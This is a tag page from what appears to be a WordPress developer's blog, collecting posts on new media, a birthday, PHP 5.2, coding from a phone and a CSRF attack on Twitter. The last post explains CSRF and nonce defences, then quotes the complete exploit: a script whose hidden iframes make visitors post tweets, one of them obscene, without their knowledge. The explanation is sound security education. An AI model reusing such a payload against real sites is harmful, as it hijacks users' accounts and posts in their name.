Tag: WordPress

Sports, WordPress, and new media

David Carr of The New York Times presented this analogy on the evolving state of media outlets. The sports analogy is awesome, but I particularly love how he uses WordPress metonymically to refer to new media publishing:

More and more, media outlets are becoming a federation of individual brands like Mr. Kurtz. Journalism is starting to look like sports, where a cast of role players serves as a platform and context for highly paid, high-impact players. And those who cross over, after years of pushing copy through the print apparatus, will experience the allure of knocking some copy into WordPress and sending it out into the world to fend for itself.

h/t Jeff Waugh, Laurie Oakes.

My first WordPress birthday

Seriously, does it get cooler than this?

Tweet from @wordpress: Happy Birthday, @nacin! Thank you for all you do for @wordpress and the community.

Normally I enjoy the dozens of Facebook wall posts I get on this date every year, many from friends I don’t hear from too often. But there’s something really special about the dozens of mostly random tweets and retweets 1 wishing me a happy birthday and thanking me for my hard work. It makes me feel proud of the work we do and the impact we have doing it.

I only got involved in the WordPress community late last year. A year ago, I could never have imagined where I am now. I love what I do as a core developer. It’s crazy. And it looks like WordPress loves me back, too. Thanks Jane for the tweet, and so many of you in the community for the birthday wishes! 🙂

If you want to pitch a little my way in support my contributions to WordPress, I’ve added a donate page that includes a link to a newly minted but woefully incomplete Amazon wish list.

Jane only really thought about doing this recently, but there were two other birthdays in the last two weeks I would be remiss not to mention: good friends and fellow WordPress contributors Daryl Koopersmith and Dion Hulse. I’m now 22, Daryl is 21, Dion is 23, so we’ve got quite a bit ahead of us and I don’t think we’ll be going anywhere anytime soon.

Notes:

  1. And the new followers courtesy of the @wordpress account’s 77,000 followers! 🙂

On PHP, Redux

Earlier today, Aaron Jorbin showed me an interesting conversation on the Portland PHP mailing list about PHP 5.2 and WordPress. I’ve previously written about this subject around the time we announced we were moving the minimum requirements to PHP 5.2 in WordPress 3.2, but there were a lot of questions, concerns, and statements in this thread that deserved a reply, so I joined up to offer one.

I was really happy with how my response turned out. I think it very effectively laid our thoughts and strategies on the table. It was pretty long (I jokingly coined a new unit of measurement in the process) and I believe it was an informative read, so I wanted to re-post it here. I’ve quoted previous emails from the thread throughout my reply, which has been lightly edited — Continue reading On PHP, Redux

Mobile coding

Photo by Remo

I love my Droid X phone. I was a little nervous when I switched from my BlackBerry in July, due to the Droid’s shorter battery life (but giant screen!), largess (but giant screen!), and lack of a physical keyboard (but giant screen!). Clearly, I feel the beautiful, giant screen makes up for this. Not to mention a second battery as a backup.

One thing that always seems to amaze me is how powerful these devices are becoming. I seamlessly transition between devices all day long, and it also allows me to carry my laptop less and leave my desk more without having that unsettling ‘untethered’ feeling.

With that, here’s a cool process story from a few weeks ago. Daniel Bachhuber sent me a message asking why HTML was being filtered on a WordPress import, even though he was disabling the filtering system. (Read his roundup.) I checked his code and it looked fine, so I was stumped and didn’t know what to tell him. Fast forward to that evening, I was in the Metro with Aaron Jorbin on the way to the monthly DC PHP meetup, and in mid-conversation (which was entirely unrelated) it suddenly it dawned on me I was pretty sure that on multisite, we enforced filtering on import even for super administrators. 1

I fired off a quick email with my suspicions. Moments later I opened my Android browser and was browsing the WordPress source (I have it bookmarked, of course), and found the line. Success.

It didn’t stop there. After the meetup, I joined John Bloch 2 and a few others at the bar around the corner. While there, I received a reply from Daniel, and he wasn’t exactly happy that the only way around this was a core hack. I agreed, so I sent a Skype message (again, still from the phone) to Ryan Boren asking about perhaps adding a filter. He liked the idea, so I opened a new browser tab 3 and created a Trac ticket.

Of course, I had to keep going. So I fired up my SSH client, navigated to a checked out Subversion repository on my server, updated to trunk, opened the right files in Vim, and made the changes. After a sanity check from John, I was able to then commit a filter. All from my phone, having not opened my laptop all evening. Fun times.

Development while on the go is something I’ve wanted to attempt for a while — if only just once. Clearly only so much testing can go into it, and it’s certainly not something that will become a habit. Nonetheless, it was a quirky and fun experience, and it’s a testament to how powerful these mini-computers have evolved.

Notes:

  1. This does make sense, considering that super admins are often running imports of untrusted content when setting up sites for users. The fact that it was impossible to disable, though, was kind of lame.
  2. John also posted a good roundup of the meetup here.
  3. I can’t even live without tabs on my phone. What did I do before tabbed browsing on the desktop?

CSRF attack strikes Twitter

I mean, who didn’t see this coming?

Twitter allows a URL to send a tweet. Many sites and retweet buttons and such rely on it. No POST, no nonce, nothing. Just a simple HTTP GET triggers a tweet. Clearly, someone was going to exploit this eventually.

Authentication is not the same as intention. You can’t just determine that a user is allowed to do something, but also that they intended to do something. When intent is not established, and especially when the form can be submitted via a GET request, it makes these kinds of exploits child’s play, as you can see by the complete exploit code below. It’s called a cross-site request forgery, or CSRF (or XSRF).

How do you determine intention? You’ll want to avoid accepting information over GET, but really that does nothing. Next step would be to check the HTTP referrer, but those can be spoofed. Since that isn’t foolproof, then you need to use something like a nonce check, like what we use in WordPress. For Twitter to secure the site from a CSRF vulnerability, they’ll be breaking a lot of embedded tools and buttons on many, many sites, so for now, they’ve apparently disabled the share endpoint that was exploited.

For the WordPress developers out there, probably the best read out there is this post by Mark Jaquith, from four years ago. It still applies as if it was written yesterday. For the non-WordPress developers, it’s still a great read as it explains what’s really going on, how WordPress prevents it, and why intention is important (if that isn’t obvious enough).

Once again, Twitter users are victims, thanks to the lack of basic security practices.

Update: Check out TechCrunch’s coverage. They quote a certain commenter who explained the issue. 🙂

Here’s the exploit:

<script type="text/javascript">
var el1 = document.createElement('iframe');
var el2 = document.createElement('iframe');
el1.style.visibility="hidden";
el2.style.visibility="hidden";
el1.src = "http://twitter.com/share/update?status=WTF:%20" + window.location;
el2.src = "http://twitter.com/share/update?status=i%20love%20anal%20sex%20with%20goats";
document.getElementsByTagName("body")[0].appendChild(el1);
document.getElementsByTagName("body")[0].appendChild(el2);
</script>